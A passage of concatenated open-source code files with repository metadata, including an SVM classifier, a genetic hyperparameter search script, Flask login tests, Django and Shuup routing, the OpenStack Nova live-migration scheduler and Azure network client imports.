elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
return result
def to_str(self):
"""
Returns the string representation of the model
"""
return pformat(self.to_dict())
def __repr__(self):
"""
For `print` and `pprint`
"""
return self.to_str()
def __eq__(self, other):
"""
Returns true if both objects are equal
"""
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""
Returns true if both objects are not equal
"""
return not self == other
| detiber/lib_openshift | lib_openshift/models/v1_image_stream_import_status.py | Python | apache-2.0 | 5,152 |
import numpy as np
from AbstractClassifier import AbstractClassfier
class Svm(AbstractClassfier):
def __init__(self):
self._w = np.array([])
self._mins = np.array([])
self._maxs = np.array([])
self.false_positive_loss = 1
self.false_negative_loss = 1
self.error = 0
self.simple_error = 0
def _sub_gradient_loss(self, example, W, c, n):
(x, y) = example[:-1], example[-1]
grad_loss = W / n
if 1 - self._loss_value(y)*y * W.dot(x) > 0:
grad_loss -= c*self._loss_value(y)*y * x
return grad_loss
def _loss_value(self, y):
return self.false_negative_loss if y == 1 else self.false_positive_loss
def _svm_c(self, examples, c, epoch):
"""
:param examples:
:param c:
:return:
"""
num_ex = examples.shape[0]
alpha = 1
w_vec = np.zeros(examples.shape[1]-1)
t = 0
for _ in range(epoch * num_ex):
r = examples[np.random.randint(num_ex)]
t += 1
w_vec -= alpha/t * self._sub_gradient_loss(r, w_vec, c, num_ex)
return w_vec
def learn(self, examples, c_arr=None, epoch=3, learning_part=0.7, cross_validation_times=5):
"""
:param learning_part:
:param examples:
:param cross_validation_times:
:param epoch:
:param x_mat: Vector X of vectors of features
:param y_vec:
:param c_arr:
"""
if c_arr is None:
c_arr = 2**np.arange(-5, 16, 2.0)
n = examples.shape[0]
middle = round(n*learning_part) if learning_part > 0 else -1
# normalize
x_mat = examples[:, :-1]
mins = x_mat.min(axis=0)
maxs = x_mat.max(axis=0) - mins
x_mat[:] = (x_mat - mins) / maxs
c_len = c_arr.shape[0]
errors = np.zeros(c_len)
for j in range(c_len):
c = c_arr[j]
error = 0
for _ in range(cross_validation_times):
shuffled = np.random.permutation(examples)
learnings, testings = np.split(shuffled, [middle])
w_vec = self._svm_c(learnings, c, epoch)
error = sum([(r[-1] * w_vec.dot(r[:-1]) < 0) * self._loss_value(r[-1]) for r in testings])
errors[j] += error/testings.shape[0]
errors /= cross_validation_times
result_c = c_arr[np.argmin(errors)]
w_vec = self._svm_c(examples, result_c, epoch)
#ending
self._w = w_vec
self._mins = mins
self._maxs = maxs
self.error = sum([(r[-1] * w_vec.dot(r[:-1]) < 0) * self._loss_value(r[-1]) for r in examples]) / n
self.simple_error = sum([(r[-1] * w_vec.dot(r[:-1]) < 0) for r in examples]) / n
def to_list(self):
return [self._w, self._mins, self._maxs, self.error, self.simple_error]
def from_list(self, list_):
if len(list_) != 5:
raise ValueError('from_list: len(list_) has to be 5')
self._w, self._mins, self._maxs, self.error, self.simple_error = list_
def classify(self, x):
return self._w.dot((x - self._mins) / self._maxs) > 0
def classify_vec(self, vec, axis=-1):
return np.apply_along_axis(self.classify, axis, vec)
def valuefy(self, x):
return self._w.dot((x - self._mins) / self._maxs)
def valuefy_vec(self, vec, axis=-1):
return np.apply_along_axis(self.valuefy, axis, vec)
| zardav/FaceDetection | FaceDetection/Svm.py | Python | gpl-3.0 | 3,493 |
#!/bin/sh
''''exec python3 -u -- "$0" ${1+"$@"} # '''
# #! /usr/bin/env python3
# Copyright 2016 Euclidean Technologies Management LLC All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import time
import os
import sys
import copy
import subprocess
import os
import math
import numpy as np
import regex as re
import pandas as pd
import argparse as ap
import random as random
import time
import configs as configurations
import pickle
_SHELL = '/bin/sh'
_VALID_ERR_IDX = 7
def get_search_configs():
"""
Defines the configurations for hyper parameter search
"""
configurations.DEFINE_string("template",None,"Template file for hyper-param search")
configurations.DEFINE_string("search_algorithm","genetic","Algorithm for hyper-param optimization. Select from 'genetic', 'grid_search'")
configurations.DEFINE_integer("generations",100,"Number of generations for genetic algorithm")
configurations.DEFINE_integer("pop_size",20,"Population size for genetic algorithm")
configurations.DEFINE_integer("num_survivors",10,"Number of survivors for genetic algorithm")
configurations.DEFINE_integer("num_threads",4,"NUmber of parallel threads (Number of parallel executions)")
configurations.DEFINE_integer("num_gpu",1,"Number of GPU on the machine, Use 0 if there are None")
configurations.DEFINE_integer("sleep_time",1,"Sleep time")
configurations.DEFINE_float("mutate_rate",0.2,"Mutation rate for genetic algorithm")
configurations.DEFINE_string("init_pop",None,"Specify starting population. Path to the pickle file")
c = configurations.ConfigValues()
return c
def get_name(gen,i):
d1 = max(6,len(str(gen)))
d2 = max(6,len(str(i)))
fmt = 'gen-%0'+str(d1)+'d-mem-%0'+str(d2)+'d';
return fmt%(gen,i);
def output_filename(gen,i):
name = get_name(gen,i)
filename = "output/stdout-%s.txt"%name
return filename
def config_filename(gen,i):
name = get_name(gen,i)
return "%s.conf"%name
def donefile_filename(gen,thread):
return "output/done-g%04d-u%03d.txt"%(gen,thread)
def script_filename(gen,thread):
dirname = 'scripts'
basename = dirname + "/train-g%04d"%gen
scriptname = basename + "-u%03d.sh"%thread
return scriptname
def serialize_member(mem):
str = ""
for el in sorted(mem):
if el != '--name' and el != '--model_dir':
str += ':' + mem[el][0]
return str
def generate_results_test(pop,gen):
result = list()
for i in range(len(pop)):
str = serialize_member(pop[i])
seed = hash(str)
random.seed(seed)
result.append(random.random())
return result
def generate_results(pop,gen):
result = list()
for i in range(len(pop)):
filename = output_filename(gen,i)
print("Reading file "+filename)
with open(filename) as f:
content = f.readlines()
content = [x.strip() for x in content]
# remove lines w/o error
try:
content = [s for s in content if re.search('MSE_w_variance',s)]
errors = [float(s.split()[_VALID_ERR_IDX]) for s in content]
assert len(content) > 0
except AssertionError:
content = [s for s in content if re.search('Valid LOSS',s)]
errors = [float(s.split()[-1]) for s in content]
if len(errors) > 0:
errors.sort()
result.append(errors[0])
else:
result.append(float('inf'))
if result[-1] == 'nan':
result[-1] = float('inf')
print("-"*80)
print(result)
assert(len(pop) == len(result))
return result
def poll_for_done(pop,gen):
not_done = True
while(not_done):
time.sleep(_SLEEP_TIME) #
num_done = 0
for thread in range(_NUM_THREADS):
if os.path.isfile(donefile_filename(gen,thread)):
num_done += 1
if num_done == _NUM_THREADS:
not_done = False
def execute_train_scripts(pop,gen):
str = ""
for thread in range(_NUM_THREADS):
str += script_filename(gen,thread) + " & "
os.system(str)
def create_train_scripts(pop,gen):
dirname = 'scripts'
if os.path.isdir(dirname) is False:
os.makedirs(dirname)
if os.path.isdir('output') is False:
os.makedirs('output')
if os.path.isdir('chkpts') is False:
os.makedirs('chkpts')
for thread in range(_NUM_THREADS):
scriptname = script_filename(gen,thread)
with open(scriptname,"w") as f:
print("#!%s"%_SHELL,file=f)
assert(len(pop)%_NUM_THREADS==0)
m = len(pop)//_NUM_THREADS
pop_idxs = [thread*m + i for i in range(m)]
for i in pop_idxs:
id_seed = int(17*gen + i)
# Add GPU number to the members of the generation
if _NUM_GPU!=0:
str = "CUDA_VISIBLE_DEVICES=%d"%(thread%_NUM_GPU)
elif _NUM_GPU==0:
str = "CUDA_VISIBLE_DEVICES=''"
str += " /home/lchauhan/deep-quant/scripts/deep_quant.py"
str += " --config=config/"+config_filename(gen,i)
#str += " --seed=%i"%id_seed
str += " --UQ=True"
str += " --cache_id=%i"%id_seed
str += " > " + output_filename(gen,i)
str += " 2> output/stderr-%s.txt"%get_name(gen,i)
#str += "; rm -rf chkpts/chkpts-%s"%get_name(gen,i)+";"
print(str,file=f)
donefile = donefile_filename(gen,thread)
print("echo 'done.' > %s"%donefile,file=f)
f.closed
os.system("chmod +x %s"%scriptname)
def write_population_configs(pop,gen):
dirname = 'config'
if os.path.isdir(dirname) is not True:
os.makedirs(dirname)
for i in range(len(pop)):
filename = dirname + '/' + config_filename(gen,i)
configs = pop[i]
configs['--model_dir'][0] = "chkpts/chkpts-%s"%get_name(gen,i)
with open(filename,"w") as f:
for flag in sorted(configs):
print("%-30s %s"%(flag,configs[flag][0]),file=f)
f.closed
def train_population(pop,gen):
""" Train the population
Args:
pop is a population
gen is the generation number (id)
Returns:
An array of performance/error for each pop member
"""
assert(type(pop) is list)
write_population_configs(pop,gen)
create_train_scripts(pop,gen)
execute_train_scripts(pop,gen)
poll_for_done(pop,gen)
result = generate_results(pop,gen)
#result = generate_results_test(pop,gen)
return result
def calc_diversity(pop):
mems = [serialize_member(m) for m in pop]
count = float(len(mems))
uniq = float(len(set(mems)))
assert(count > 0)
return uniq/count
def swap(items,i,j):
""" Swap two items in a list
"""
assert(type(items) is list)
tmp = items[i]
items[i] = items[j]
items[j] = tmp
def randomize(mem):
""" Radomize a population memeber
Args: A member of a pop (dict of lists)
"""
assert(type(mem) is dict)
for flag in mem:
items = mem[flag]
if len(items) > 1:
i = random.randrange(0,len(items))
swap(items,0,i)
def mutate(mem):
""" Mutate a population memeber
Args: A member of a pop (dict of lists)
"""
assert(type(mem) is dict)
# get flags that have more than one element
flags = [f for f in mem if len(mem[f]) > 1]
# randomly choose one
random.shuffle(flags)
flag = flags[0]
# mutate it
i = random.randrange(1,len(mem[flag]))
before = mem[flag][0]
before_s = serialize_member(mem)
swap(mem[flag],0,i)
after = mem[flag][0]
after_s = serialize_member(mem)
print("mutation: %s: %s -> %s"%(flag,before,after))
print("BE "+before_s)
print("AF "+after_s)
def init_population(config):
""" Initialize a population
Args: config
Returns: population
"""
pop = list()
for i in range(_POP_SIZE):
mem = copy.deepcopy(config)
randomize(mem)
mem['--name'] = list()
mem['--name'].append(get_name(1,i))
str = serialize_member(mem)
print("IN %s %s"%(str,hash(str)))
pop.append(mem)
return pop
def cross_parents(mom,dad,child_name='none'):
assert(type(mom) is dict)
assert(type(dad) is dict)
child = dict()
for flag in mom:
assert(type(mom[flag]) is list)
assert(type(dad[flag]) is list)
items = mom[flag] if random.random() > 0.5 else dad[flag]
child[flag] = items[:] # ensure a copy
child['--name'][0] = child_name
print("Crossing (1) x (2) = (3)")
print("1: " + serialize_member(mom))
print("2: " + serialize_member(dad))
print("3: " + serialize_member(child))
return child
def get_next_generation(pop, gen, results):
assert(type(pop) is list)
assert(type(results) is list)
assert(len(pop) == len(results))
combined = list(zip(results,pop))
# lowest values are at top of list
print('-'*80)
#print(type(combined))
#print(type(combined[0][0]))
#print(type(combined[0][1]))
combined.sort(key=lambda tup: tup[0])
new_best = combined[0]
survivors = [combined[i][1] for i in range(_NUM_SURVIVORS)]
new_pop = list()
for i in range(_POP_SIZE):
# cross two suvivors
random.shuffle(survivors)
mom = survivors[0]
dad = survivors[1]
child = cross_parents(mom,dad,child_name=get_name(gen+1,i))
# mutations
if random.random() <= _MUTATE_RATE:
mutate(child)
new_pop.append(child)
return new_pop, new_best
def parse_config(filename):
with open(filename) as f:
content = f.readlines()
# remove whitespace characters like `\n` at the end of each line
# and remove empty lines
content = [x.strip() for x in content if len(x)]
config = dict()
for i in range(len(content)):
elements = content[i].split()
flag = elements.pop(0)
config[flag] = elements
return config
def execute_genetic_search(args):
config_filename = args.template
# config is a dict of lists
config = parse_config(config_filename)
random.seed(config['--seed'][0])
print("Seaching on the following configs:")
for flag in config:
if (len(config[flag]) > 1):
print(" %s -> (%s)"%(flag,','.join(config[flag])))
results = [float('inf')]*_POP_SIZE
# Read user specified or latest population
if args.init_pop:
pop = pickle.load(open(str(args.init_pop),"rb"))
else:
pop = init_population(config)
best = None
for i in range(_GENERATIONS):
gen = i+1
# Save the latest generation
dir = "_latest_pop"
if not os.path.exists(dir):
os.makedirs(dir)
pickle.dump(pop,open("_latest_pop/latest_pop.pkl","wb"))
result = train_population(pop,gen)
diversity = calc_diversity(pop)
(pop,new_best) = get_next_generation(pop,gen,result)
if best is None or best[0] > new_best[0]:
best = new_best
best_name = best[1]['--name'][0]
error = float(best[0])
print("Generation: %s Best: %s Error: %.4f Diversity: %3d%%"%(gen,best_name,error,int(100*diversity)))
sys.stdout.flush()
def get_all_config_permutations(src,tbl,i,allperms):
flags = [f for f in sorted(src)]
if i == len(flags):
allperms.append(tbl)
else:
flag = flags[i]
curr = src[flag]
for param in curr:
new_tbl = tbl.copy()
new_tbl[flag] = [param]
get_all_config_permutations(src,new_tbl,i+1,allperms)
def execute_grid_search(args):
config_filename = args.template
# config is a dict of lists
config = parse_config(config_filename)
allperms = list()
tbl = dict()
get_all_config_permutations(config,tbl,0,allperms)
train_population(allperms,0)
def main():
config_search_args = get_search_configs()
# Define Global Variables
global _GENERATIONS
global _POP_SIZE
global _NUM_SURVIVORS
global _NUM_THREADS
global _NUM_GPU
global _SLEEP_TIME
global _MUTATE_RATE
_GENERATIONS = config_search_args.generations
_POP_SIZE = config_search_args.pop_size
_NUM_SURVIVORS = config_search_args.num_survivors
_NUM_THREADS = config_search_args.num_threads
_NUM_GPU = config_search_args.num_gpu
_SLEEP_TIME = config_search_args.sleep_time
_MUTATE_RATE = config_search_args.mutate_rate
if config_search_args.search_algorithm == 'genetic':
execute_genetic_search(config_search_args)
elif config_search_args.search_algorithm == 'grid_search':
execute_grid_search(config_search_args)
else:
print("No search algorithm specified. Selecting default = genetic")
execute_genetic_search(config_search_args)
if __name__ == "__main__":
main()
| euclidjda/deep-quant | scripts/hyper_param_search_uq.py | Python | mit | 13,692 |
# -*- coding: utf-8 -*-
"""Functional tests using WebTest.
See: http://webtest.readthedocs.org/
"""
import pytest
from flask import url_for
from nostra.models.user import User
from .factories import UserFactory
class TestLoggingIn:
def test_can_log_in_returns_200(self, user, testapp):
# Goes to homepage
res = testapp.get("/")
# Fills out login form in navbar
form = res.forms['loginForm']
form['username'] = user.username
form['password'] = 'myprecious'
# Submits
res = form.submit().follow()
assert res.status_code == 200
def test_sees_alert_on_log_out(self, user, testapp):
res = testapp.get("/")
# Fills out login form in navbar
form = res.forms['loginForm']
form['username'] = user.username
form['password'] = 'myprecious'
# Submits
res = form.submit().follow()
res = testapp.get(url_for('public.logout')).follow()
# sees alert
assert 'You are logged out.' in res
def test_sees_error_message_if_password_is_incorrect(self, user, testapp):
# Goes to homepage
res = testapp.get("/")
# Fills out login form, password incorrect
form = res.forms['loginForm']
form['username'] = user.username
form['password'] = 'wrong'
# Submits
res = form.submit()
# sees error
assert "Invalid password" in res
def test_sees_error_message_if_username_doesnt_exist(self, user, testapp):
# Goes to homepage
res = testapp.get("/")
# Fills out login form, password incorrect
form = res.forms['loginForm']
form['username'] = 'unknown'
form['password'] = 'myprecious'
# Submits
res = form.submit()
# sees error
assert "Unknown user" in res
class TestRegistering:
def test_can_register(self, user, testapp):
old_count = len(User.query.all())
# Goes to homepage
res = testapp.get("/")
# Clicks Create Account button
res = res.click("Create account")
# Fills out the form
form = res.forms["registerForm"]
form['username'] = 'foobar'
form['email'] = '[email protected]'
form['password'] = 'secret'
form['confirm'] = 'secret'
# Submits
res = form.submit().follow()
assert res.status_code == 200
# A new user was created
assert len(User.query.all()) == old_count + 1
def test_sees_error_message_if_passwords_dont_match(self, user, testapp):
# Goes to registration page
res = testapp.get(url_for("public.register"))
# Fills out form, but passwords don't match
form = res.forms["registerForm"]
form['username'] = 'foobar'
form['email'] = '[email protected]'
form['password'] = 'secret'
form['confirm'] = 'secrets'
# Submits
res = form.submit()
# sees error message
assert "Passwords must match" in res
def test_sees_error_message_if_user_already_registered(self, user, testapp):
user = UserFactory(active=True) # A registered user
user.save()
# Goes to registration page
res = testapp.get(url_for("public.register"))
# Fills out form, but username is already registered
form = res.forms["registerForm"]
form['username'] = user.username
form['email'] = '[email protected]'
form['password'] = 'secret'
form['confirm'] = 'secret'
# Submits
res = form.submit()
# sees error
assert "Username already registered" in res
| jamesbbaker96/nostra | tests/test_functional.py | Python | bsd-3-clause | 3,658 |
# -*- coding: utf-8 -*-
# This file is part of Shuup.
#
# Copyright (c) 2012-2016, Shoop Ltd. All rights reserved.
#
# This source code is licensed under the AGPLv3 license found in the
# LICENSE file in the root directory of this source tree.
from django.conf.urls import patterns, url
from . import views
urlpatterns = patterns(
'',
url('^saved-carts/$', views.CartListView.as_view(),
name='saved_cart.list'),
url('^saved-carts/save/$', views.CartSaveView.as_view(),
name='saved_cart.save'),
url('^saved-carts/(?P<pk>\d+)/add/$', views.CartAddAllProductsView.as_view(),
name='saved_cart.add_all'),
url('^saved-carts/(?P<pk>\d+)/delete/$', views.CartDeleteView.as_view(),
name='saved_cart.delete'),
url('^saved-carts/(?P<pk>.+)/$', views.CartDetailView.as_view(),
name='saved_cart.detail')
)
| hrayr-artunyan/shuup | shuup/front/apps/saved_carts/urls.py | Python | agpl-3.0 | 859 |
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
('api', '0048_auto_20150406_1922'),
]
operations = [
migrations.AddField(
model_name='account',
name='accept_friend_requests',
field=models.NullBooleanField(verbose_name='Accept friend requests'),
preserve_default=True,
),
]
| SchoolIdolTomodachi/SchoolIdolAPI | api/migrations/0049_account_accept_friend_requests.py | Python | apache-2.0 | 479 |
# vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright (c) 2010 Openstack, LLC.
# Copyright 2010 United States Government as represented by the
# Administrator of the National Aeronautics and Space Administration.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
Scheduler base class that all Schedulers should inherit from
"""
import datetime
from nova import db
from nova import exception
from nova import flags
from nova import log as logging
from nova import rpc
from nova import utils
from nova.compute import power_state
from nova.compute import vm_states
from nova.api.ec2 import ec2utils
FLAGS = flags.FLAGS
flags.DEFINE_integer('service_down_time', 60,
'maximum time since last checkin for up service')
flags.DECLARE('instances_path', 'nova.compute.manager')
class NoValidHost(exception.Error):
"""There is no valid host for the command."""
pass
class WillNotSchedule(exception.Error):
"""The specified host is not up or doesn't exist."""
pass
class Scheduler(object):
"""The base class that all Scheduler clases should inherit from."""
def __init__(self):
self.zone_manager = None
def set_zone_manager(self, zone_manager):
"""Called by the Scheduler Service to supply a ZoneManager."""
self.zone_manager = zone_manager
@staticmethod
def service_is_up(service):
"""Check whether a service is up based on last heartbeat."""
last_heartbeat = service['updated_at'] or service['created_at']
# Timestamps in DB are UTC.
elapsed = utils.utcnow() - last_heartbeat
return elapsed < datetime.timedelta(seconds=FLAGS.service_down_time)
def hosts_up(self, context, topic):
"""Return the list of hosts that have a running service for topic."""
services = db.service_get_all_by_topic(context, topic)
return [service.host
for service in services
if self.service_is_up(service)]
def schedule(self, context, topic, *_args, **_kwargs):
"""Must override at least this method for scheduler to work."""
raise NotImplementedError(_("Must implement a fallback schedule"))
def schedule_live_migration(self, context, instance_id, dest,
block_migration=False):
"""Live migration scheduling method.
:param context:
:param instance_id:
:param dest: destination host
:return:
The host where instance is running currently.
Then scheduler send request that host.
"""
# Whether instance exists and is running.
instance_ref = db.instance_get(context, instance_id)
# Checking instance.
self._live_migration_src_check(context, instance_ref)
# Checking destination host.
self._live_migration_dest_check(context, instance_ref,
dest, block_migration)
# Common checking.
self._live_migration_common_check(context, instance_ref,
dest, block_migration)
# Changing instance_state.
values = {"vm_state": vm_states.MIGRATING}
db.instance_update(context, instance_id, values)
# Changing volume state
for volume_ref in instance_ref['volumes']:
db.volume_update(context,
volume_ref['id'],
{'status': 'migrating'})
# Return value is necessary to send request to src
# Check _schedule() in detail.
src = instance_ref['host']
return src
def _live_migration_src_check(self, context, instance_ref):
"""Live migration check routine (for src host).
:param context: security context
:param instance_ref: nova.db.sqlalchemy.models.Instance object
"""
# Checking instance is running.
if instance_ref['power_state'] != power_state.RUNNING:
instance_id = ec2utils.id_to_ec2_id(instance_ref['id'])
raise exception.InstanceNotRunning(instance_id=instance_id)
# Checing volume node is running when any volumes are mounted
# to the instance.
if len(instance_ref['volumes']) != 0:
services = db.service_get_all_by_topic(context, 'volume')
if len(services) < 1 or not self.service_is_up(services[0]):
raise exception.VolumeServiceUnavailable()
# Checking src host exists and compute node
src = instance_ref['host']
services = db.service_get_all_compute_by_host(context, src)
# Checking src host is alive.
if not self.service_is_up(services[0]):
raise exception.ComputeServiceUnavailable(host=src)
def _live_migration_dest_check(self, context, instance_ref, dest,
block_migration):
"""Live migration check routine (for destination host).
:param context: security context
:param instance_ref: nova.db.sqlalchemy.models.Instance object
:param dest: destination host
"""
# Checking dest exists and compute node.
dservice_refs = db.service_get_all_compute_by_host(context, dest)
dservice_ref = dservice_refs[0]
# Checking dest host is alive.
if not self.service_is_up(dservice_ref):
raise exception.ComputeServiceUnavailable(host=dest)
# Checking whether The host where instance is running
# and dest is not same.
src = instance_ref['host']
if dest == src:
instance_id = ec2utils.id_to_ec2_id(instance_ref['id'])
raise exception.UnableToMigrateToSelf(instance_id=instance_id,
host=dest)
# Checking dst host still has enough capacities.
self.assert_compute_node_has_enough_resources(context,
instance_ref,
dest,
block_migration)
def _live_migration_common_check(self, context, instance_ref, dest,
block_migration):
"""Live migration common check routine.
Below checkings are followed by
http://wiki.libvirt.org/page/TodoPreMigrationChecks
:param context: security context
:param instance_ref: nova.db.sqlalchemy.models.Instance object
:param dest: destination host
:param block_migration if True, check for block_migration.
"""
# Checking shared storage connectivity
# if block migration, instances_paths should not be on shared storage.
try:
self.mounted_on_same_shared_storage(context, instance_ref, dest)
if block_migration:
reason = _("Block migration can not be used "
"with shared storage.")
raise exception.InvalidSharedStorage(reason=reason, path=dest)
except exception.FileNotFound:
if not block_migration:
src = instance_ref['host']
ipath = FLAGS.instances_path
logging.error(_("Cannot confirm tmpfile at %(ipath)s is on "
"same shared storage between %(src)s "
"and %(dest)s.") % locals())
raise
# Checking dest exists.
dservice_refs = db.service_get_all_compute_by_host(context, dest)
dservice_ref = dservice_refs[0]['compute_node'][0]
# Checking original host( where instance was launched at) exists.
try:
oservice_refs = db.service_get_all_compute_by_host(context,
instance_ref['launched_on'])
except exception.NotFound:
raise exception.SourceHostUnavailable()
oservice_ref = oservice_refs[0]['compute_node'][0]
# Checking hypervisor is same.
orig_hypervisor = oservice_ref['hypervisor_type']
dest_hypervisor = dservice_ref['hypervisor_type']
if orig_hypervisor != dest_hypervisor:
raise exception.InvalidHypervisorType()
# Checkng hypervisor version.
orig_hypervisor = oservice_ref['hypervisor_version']
dest_hypervisor = dservice_ref['hypervisor_version']
if orig_hypervisor > dest_hypervisor:
raise exception.DestinationHypervisorTooOld()
# Checking cpuinfo.
try:
rpc.call(context,
db.queue_get_for(context, FLAGS.compute_topic, dest),
{"method": 'compare_cpu',
"args": {'cpu_info': oservice_ref['cpu_info']}})
except rpc.RemoteError:
src = instance_ref['host']
logging.exception(_("host %(dest)s is not compatible with "
"original host %(src)s.") % locals())
raise
def assert_compute_node_has_enough_resources(self, context, instance_ref,
dest, block_migration):
"""Checks if destination host has enough resource for live migration.
:param context: security context
:param instance_ref: nova.db.sqlalchemy.models.Instance object
:param dest: destination host
:param block_migration: if True, disk checking has been done
"""
self.assert_compute_node_has_enough_memory(context, instance_ref, dest)
if not block_migration:
return
self.assert_compute_node_has_enough_disk(context, instance_ref, dest)
def assert_compute_node_has_enough_memory(self, context,
instance_ref, dest):
"""Checks if destination host has enough memory for live migration.
:param context: security context
:param instance_ref: nova.db.sqlalchemy.models.Instance object
:param dest: destination host
"""
# Getting total available memory and disk of host
avail = self._get_compute_info(context, dest, 'memory_mb')
# Getting total used memory and disk of host
# It should be sum of memories that are assigned as max value,
# because overcommiting is risky.
used = 0
instance_refs = db.instance_get_all_by_host(context, dest)
used_list = [i['memory_mb'] for i in instance_refs]
if used_list:
used = reduce(lambda x, y: x + y, used_list)
mem_inst = instance_ref['memory_mb']
avail = avail - used
if avail <= mem_inst:
instance_id = ec2utils.id_to_ec2_id(instance_ref['id'])
reason = _("Unable to migrate %(instance_id)s to %(dest)s: "
"Lack of memory(host:%(avail)s <= "
"instance:%(mem_inst)s)")
raise exception.MigrationError(reason=reason % locals())
def assert_compute_node_has_enough_disk(self, context,
instance_ref, dest):
"""Checks if destination host has enough disk for block migration.
:param context: security context
:param instance_ref: nova.db.sqlalchemy.models.Instance object
:param dest: destination host
"""
# Getting total available memory and disk of host
avail = self._get_compute_info(context, dest, 'local_gb')
# Getting total used memory and disk of host
# It should be sum of disks that are assigned as max value
# because overcommiting is risky.
used = 0
instance_refs = db.instance_get_all_by_host(context, dest)
used_list = [i['local_gb'] for i in instance_refs]
if used_list:
used = reduce(lambda x, y: x + y, used_list)
disk_inst = instance_ref['local_gb']
avail = avail - used
if avail <= disk_inst:
instance_id = ec2utils.id_to_ec2_id(instance_ref['id'])
reason = _("Unable to migrate %(instance_id)s to %(dest)s: "
"Lack of disk(host:%(avail)s "
"<= instance:%(disk_inst)s)")
raise exception.MigrationError(reason=reason % locals())
def _get_compute_info(self, context, host, key):
"""get compute node's infomation specified by key
:param context: security context
:param host: hostname(must be compute node)
:param key: column name of compute_nodes
:return: value specified by key
"""
compute_node_ref = db.service_get_all_compute_by_host(context, host)
compute_node_ref = compute_node_ref[0]['compute_node'][0]
return compute_node_ref[key]
def mounted_on_same_shared_storage(self, context, instance_ref, dest):
"""Check if the src and dest host mount same shared storage.
At first, dest host creates temp file, and src host can see
it if they mounts same shared storage. Then src host erase it.
:param context: security context
:param instance_ref: nova.db.sqlalchemy.models.Instance object
:param dest: destination host
"""
src = instance_ref['host']
dst_t = db.queue_get_for(context, FLAGS.compute_topic, dest)
src_t = db.queue_get_for(context, FLAGS.compute_topic, src)
try:
# create tmpfile at dest host
filename = rpc.call(context, dst_t,
{"method": 'create_shared_storage_test_file'})
# make sure existence at src host.
ret = rpc.call(context, src_t,
{"method": 'check_shared_storage_test_file',
"args": {'filename': filename}})
if not ret:
raise exception.FileNotFound(file_path=filename)
except exception.FileNotFound:
raise
finally:
rpc.call(context, dst_t,
{"method": 'cleanup_shared_storage_test_file',
"args": {'filename': filename}})
| nii-cloud/dodai-compute | nova/scheduler/driver.py | Python | apache-2.0 | 14,688 |
class RequestOptions(object):
class Operator:
Equals = 'eq'
GreaterThan = 'gt'
GreaterThanOrEqual = 'gte'
LessThan = 'lt'
LessThanOrEqual = 'lte'
In = 'in'
class Field:
CreatedAt = 'createdAt'
LastLogin = 'lastLogin'
Name = 'name'
OwnerName = 'ownerName'
SiteRole = 'siteRole'
Tags = 'tags'
UpdatedAt = 'updatedAt'
class Direction:
Desc = 'desc'
Asc = 'asc'
def __init__(self, pagenumber=1, pagesize=100):
self.pagenumber = pagenumber
self.pagesize = pagesize
self.sort = set()
self.filter = set()
def page_size(self, page_size):
self.pagesize = page_size
return self
def page_number(self, page_number):
self.pagenumber = page_number
return self
def apply_query_params(self, url):
params = []
if self.page_number:
params.append('pageNumber={0}'.format(self.pagenumber))
if self.page_size:
params.append('pageSize={0}'.format(self.pagesize))
if len(self.sort) > 0:
params.append('sort={}'.format(','.join(str(sort_item) for sort_item in self.sort)))
if len(self.filter) > 0:
params.append('filter={}'.format(','.join(str(filter_item) for filter_item in self.filter)))
return "{0}?{1}".format(url, '&'.join(params))
| Talvalin/server-client-python | tableauserverclient/server/request_options.py | Python | mit | 1,429 |
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from typing import TYPE_CHECKING
from azure.mgmt.core import ARMPipelineClient
from msrest import Deserializer, Serializer
if TYPE_CHECKING:
# pylint: disable=unused-import,ungrouped-imports
from typing import Any, Optional
from azure.core.credentials import TokenCredential
from azure.core.pipeline.transport import HttpRequest, HttpResponse
from ._configuration import NetworkManagementClientConfiguration
from .operations import AzureFirewallsOperations
from .operations import ApplicationGatewaysOperations
from .operations import ApplicationSecurityGroupsOperations
from .operations import NetworkManagementClientOperationsMixin
from .operations import DdosProtectionPlansOperations
from .operations import AvailableEndpointServicesOperations
from .operations import ExpressRouteCircuitAuthorizationsOperations
from .operations import ExpressRouteCircuitPeeringsOperations
from .operations import ExpressRouteCircuitConnectionsOperations
from .operations import ExpressRouteCircuitsOperations
from .operations import ExpressRouteServiceProvidersOperations
from .operations import ExpressRouteCrossConnectionsOperations
from .operations import ExpressRouteCrossConnectionPeeringsOperations
from .operations import LoadBalancersOperations
from .operations import LoadBalancerBackendAddressPoolsOperations
from .operations import LoadBalancerFrontendIPConfigurationsOperations
from .operations import InboundNatRulesOperations
from .operations import LoadBalancerLoadBalancingRulesOperations
from .operations import LoadBalancerNetworkInterfacesOperations
from .operations import LoadBalancerProbesOperations
from .operations import NetworkInterfacesOperations
from .operations import NetworkInterfaceIPConfigurationsOperations
from .operations import NetworkInterfaceLoadBalancersOperations
from .operations import NetworkSecurityGroupsOperations
from .operations import SecurityRulesOperations
from .operations import DefaultSecurityRulesOperations
from .operations import NetworkWatchersOperations
from .operations import PacketCapturesOperations
from .operations import ConnectionMonitorsOperations
from .operations import Operations
